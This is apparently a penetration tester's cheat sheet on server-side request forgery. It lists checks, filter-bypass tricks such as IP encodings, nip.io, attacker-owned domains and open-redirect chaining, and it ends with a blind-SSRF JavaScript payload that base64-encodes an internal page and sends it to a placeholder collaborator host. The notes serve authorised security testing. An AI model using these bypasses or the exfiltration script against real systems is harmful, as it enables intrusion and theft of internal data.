Server-Side Request Forgery (SSRF)
An SSRF vulnerability allows an attacker to make requests originating from the web server
Checks
- Look for anything that takes a URL input or fetches a resource (e.g., screenshot utility, pdf generator, etc.)
- If 127.0.0.1 or localhost aren't working, try variations to see if poor filtering rules are being used
- Also make note of any internal IP addresses disclosed throughout the application. Try those to see if you can access resources on those hosts.
- Check to see if the server can communicate with any other servers on the internal network
- Try to get an external interaction to a server we control. Collaborator, interactsh, etc.
- Try other URI schemes,
file://, etc. - Try looking for common images like
favicon.ico- Check the location of the image on the server
Make sure the request is coming from the server and not your browser before reporting.
Bypasses
| Mitigation | Bypass |
|---|---|
| Whitelisting | Look for an open redirect |
| Blacklisting | Create a custom CNAME and point it to the internal IP address of the target Check for poor regex handling |
| Restricted content-types, characters, or extensions | Fuzzing or finding a bypass (encoding, other) |
| No response | JavaScript XHR request |
Bypassing blacklists
- Try different ways of entering IP addresses. e.g., 127.1 instead of 127.0.0.1
- Also try different encodings
- Point a custom subdomain to 127.0.0.1 and use that
- localhost.tomfieber.dev -> 127.0.0.1
- Use nip.io
- 127.0.0.1.nip.io -> 127.0.0.1
Bypassing whitelists
- Try to figure out how the filter is working
- Can we append a domain we own? e.g.,
victim.com.hacker.com - Or
hackervictim.com - etc.
- Can we append a domain we own? e.g.,
- Chaining an open redirect
- If we can find an open redirect in another part of the application, we can use THAT URL with the SSRF to redirect to our desired site.
https://teal.ctfio.com/?redirect=https://YOUR-OAST-PAYLOAD
- If we can find an open redirect in another part of the application, we can use THAT URL with the SSRF to redirect to our desired site.
- Chaining HTML injection/XSS
Try something like
Blind SSRF
Example exploit script
<script>
exfil = new XMLHttpRequest();
// Set the correct server below e.g <https://abcdefg.ctfio.com>
exfil.open("GET","{server}/blind/recipe");
exfil.send();
// put your colab instance below to you can capture the contents of /blind/recipe
exfil.onload = function(){ document.write('<img src="{colab_instance}}/?x=' + btoa(this.responseText) + '">'); }
</script>